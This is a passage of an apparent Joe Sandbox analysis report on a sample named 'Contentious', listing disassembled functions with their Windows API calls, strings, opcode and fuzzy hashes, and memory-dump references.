                                            • Opcode ID: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction ID: bb6c5fc2a6f8d7f33e71238d936cb3f8bd62bfae150e474e5d39658e2f9f80dc
                                            • Opcode Fuzzy Hash: 74e200aaa936b3a7db4747673c60ce9f5ca8192e7551dfab6b5e032348f32eee
                                            • Instruction Fuzzy Hash: 65114871A00108BECB10DFA5C949DAEBBB9EF04344F20447AF905F62E1E7349E50CB28
                                            Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 004050F9
                                              • Part of subcall function 004050C1: lstrlenW.KERNEL32(004030DB,00421690,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405109
                                              • Part of subcall function 004050C1: lstrcatW.KERNEL32(00421690,004030DB), ref: 0040511C
                                              • Part of subcall function 004050C1: SetWindowTextW.USER32(00421690,00421690), ref: 0040512E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405154
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040516E
                                              • Part of subcall function 004050C1: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040517C
                                              • Part of subcall function 00405590: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                              • Part of subcall function 00405590: CloseHandle.KERNEL32(?), ref: 004055C6
                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 3585118688-0
                                            • Opcode ID: aa209f3d0ae40418b41f7dd6e4627ec59dbf63cb5a4eead4ed69750ee996e8a6
                                            • Instruction ID: 80c30345ee18bbc14dd8b48d6273e75b475bc77ebba3550ac4fd2fc2a9fefb5a
                                            • Opcode Fuzzy Hash: aa209f3d0ae40418b41f7dd6e4627ec59dbf63cb5a4eead4ed69750ee996e8a6
                                            • Instruction Fuzzy Hash: 5A115E71910204EBCF109FA0CD859DE7AB5EB04355F24447BE501B62E1D2794992DB99
                                            Function 00402D05 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(?,00000000,00402EE5,00000001,?,?,?,00000000,00403455,?), ref: 00402D18
                                            • GetTickCount.KERNEL32 ref: 00402D36
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402D53
                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403455,?), ref: 00402D61
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction ID: 28aec9c9a202fe59f1d02261ac296c366856500da95e57c0d1cdd64ebec4d4f3
                                            • Opcode Fuzzy Hash: a23b0eeb6e6d4972e87045445d6d4d51cc27d3ed683f4ea74a3e72fc0bad27a9
                                            • Instruction Fuzzy Hash: 30F05E30909235ABD6215B24FE4CD9B7FB9FB01B01B00447AF001B12E4D3B94C81CB9D
                                            Function 00405035 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405064
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004050B5
                                              • Part of subcall function 00404073: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404085
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction ID: 9c13ad67afaae448f0a4b319dcddee29e535cfa81e2793328e176173c0848073
                                            • Opcode Fuzzy Hash: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction Fuzzy Hash: D0017171500608AFDF205F11DD81A6F3666EB84354F108136FA04B91D1C77A9C52DFAE
                                            Function 00405AB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405AD2
                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,004031FD,00436000,00436800), ref: 00405AED
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: nsa
                                            • API String ID: 1716503409-2209301699
                                            • Opcode ID: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction ID: 8be7c4eca50f53f96d3bf9dd8d425998f061e8a75984e32c23608a8539937739
                                            • Opcode Fuzzy Hash: f167aa7734234d216646053731d95efdd930433ac974ad2458b2f1a97e655fa2
                                            • Instruction Fuzzy Hash: C0F09076B00204BBDB00CF5ADC45E9FBBBCEB95710F10803AEA00E7191E2B0AE40CB64
                                            Function 00405590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256B8,Error launching installer), ref: 004055B9
                                            • CloseHandle.KERNEL32(?), ref: 004055C6
                                            Strings
                                            • Error launching installer, xrefs: 004055A3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction ID: be1e6bbd108630f976ef7f5fcce94dc376a16e18e8587d411be4a41be08dbb4f
                                            • Opcode Fuzzy Hash: d5ec68fdc0a5e55d19489236d9ef0f431af9869d4c80c9762fb8e87759919094
                                            • Instruction Fuzzy Hash: 46E0B6B4A05209BFEB109B64EC49F7B7BBDEB00704F908521BD15F2290D674A9148A79
                                            Function 004068A3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction ID: f28e3593fe72fa88d01303aa629bfae6551304820caee053d49813df3e18db6a
                                            • Opcode Fuzzy Hash: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction Fuzzy Hash: C8A13371E00228CBEB28CFA8C8547ADBBB1FF44305F11816ED856BB281D7785A96DF44
                                            Function 00406AA4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction ID: 40010b11bd5e1f261aed15f7e9cc202cac7d7d8c55991c62282cde7851584d9c
                                            • Opcode Fuzzy Hash: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction Fuzzy Hash: 56911070E00228CBEF28CF98C8547ADBBB1FF44305F15816AD856BB291D7786A96DF44
                                            Function 004067BA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction ID: a4dec85b4f2f277edf9575adfc9b4107c5501948401582118949625260c0d92c
                                            • Opcode Fuzzy Hash: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction Fuzzy Hash: A4814471E04228CBEF24CFA8C8447ADBBB1FF44305F25816AD856BB281D7785A96DF44
                                            Function 004062BF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4161f4b48ad52b85f764ef67eee8988566d0e70674352aa9bcb003f0198d5343
                                            • Instruction ID: dc611af4e4960d843407fd220347fea674e86b773e62b692a16a99b1be24d87e
                                            • Opcode Fuzzy Hash: 4161f4b48ad52b85f764ef67eee8988566d0e70674352aa9bcb003f0198d5343
                                            • Instruction Fuzzy Hash: 00815671E04228DBEF24CFA8D8447ADBBB0FF44301F21816AD856BB281D7785A96DF44
                                            Function 0040670D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acbe30f518018ad0c1a364654cf67894e7733891be0c42920e0fe83b48f95201
                                            • Instruction ID: 3610b17f62bca192734b572b66cd3339a03013c9b6e0bb783a95e3f6acf6850f
                                            • Opcode Fuzzy Hash: acbe30f518018ad0c1a364654cf67894e7733891be0c42920e0fe83b48f95201
                                            • Instruction Fuzzy Hash: 32711371E00228CBEF24CF98C8547ADBBB1FF48305F25806AD856BB281D7785A96DF54
                                            Function 0040682B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6de570ad3fa47dcd8052fca1d6f9ef5d62ad7600836d6af3ef364bc7296d0c5e
                                            • Instruction ID: 83e3d6ef8d3793d26f8235816f1baf137dce58f43e4cd213034e7b89034c8eed
                                            • Opcode Fuzzy Hash: 6de570ad3fa47dcd8052fca1d6f9ef5d62ad7600836d6af3ef364bc7296d0c5e
                                            • Instruction Fuzzy Hash: A6713471E04228CBEF28CF98C854BADBBB1FF44305F25806AD856BB281D7785996DF44
                                            Function 00406777 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f306a4bb0e5613ad4ec4576fd476604cb5277217a9209ae60d5df005b7fe234b
                                            • Instruction ID: 6cf9b392ad20ce94c36697269ad81bf6fab0dda8c890a4cc081d40373e766ecd
                                            • Opcode Fuzzy Hash: f306a4bb0e5613ad4ec4576fd476604cb5277217a9209ae60d5df005b7fe234b
                                            • Instruction Fuzzy Hash: 61714571E00228CBEF28CF98C8547ADBBB1FF44305F15806AD856BB281D7786A56DF44
                                            Function 001521E3 Relevance: 5.2, Strings: 4, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                            • API String ID: 0-2732225958
                                            • Opcode ID: 0bd5d42d3ab929817062b5898016490bdd04b590fd2493646be318d22480eec9
                                            • Instruction ID: 051f65a748c4da729b32b5344808ce3aace142631dedd76a34ca56f720dfcc20
                                            • Opcode Fuzzy Hash: 0bd5d42d3ab929817062b5898016490bdd04b590fd2493646be318d22480eec9
                                            • Instruction Fuzzy Hash: 2F511B76E04218CFDF658B68C85437E7BB2FB8A302F1445A9C8199B251DF308D89CB92
                                            Function 00151478 Relevance: 5.1, Strings: 4, Instructions: 62COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$F$F$F
                                            • API String ID: 0-357777271
                                            • Opcode ID: f6db8f5af6bbbf6ab865ea36725e6382b09f7f277dfeae731be1ffad45098b67
                                            • Instruction ID: 5faa996209f4a0bf752bc8108fd15f3169c211853329d3a08689d3dc217fb5a3
                                            • Opcode Fuzzy Hash: f6db8f5af6bbbf6ab865ea36725e6382b09f7f277dfeae731be1ffad45098b67
                                            • Instruction Fuzzy Hash: 5C219D34A04348EFCB16DFB4D0516EE7BB1EB86306F1085A9D8559B346DB38AA09CF41
                                            Function 00156088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                            • API String ID: 0-3001612457
                                            • Opcode ID: 56bc684085ae1ab1cdf4c27a66fda89f87534728fa33c578c088315b102a3619
                                            • Instruction ID: 18fcfd9b0d87917ddaa3ded3db9e5c2bc3b80b5fa1e8bebec8c8d5842e4de071
                                            • Opcode Fuzzy Hash: 56bc684085ae1ab1cdf4c27a66fda89f87534728fa33c578c088315b102a3619
                                            • Instruction Fuzzy Hash: 94019E31710124DF8B688A2CC44492977EAAF98B62365426AF922CF2E0DF61DC4987C0
                                            Function 004059EA Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                            • lstrcmpiA.KERNEL32(00405C24,00000000), ref: 00405A12
                                            • CharNextA.USER32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A23
                                            • lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                            • Instruction ID: 4323e886e6002e66b9621bf4ea28c9688caf2d9046ca4a9676cfc0c1aa02b3f6
                                            • Opcode Fuzzy Hash: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                            • Instruction Fuzzy Hash: 1CF0C231604458AFC7029BA8DD8099FBBA8EF06364B2141A5F801F7211D274EE019FA9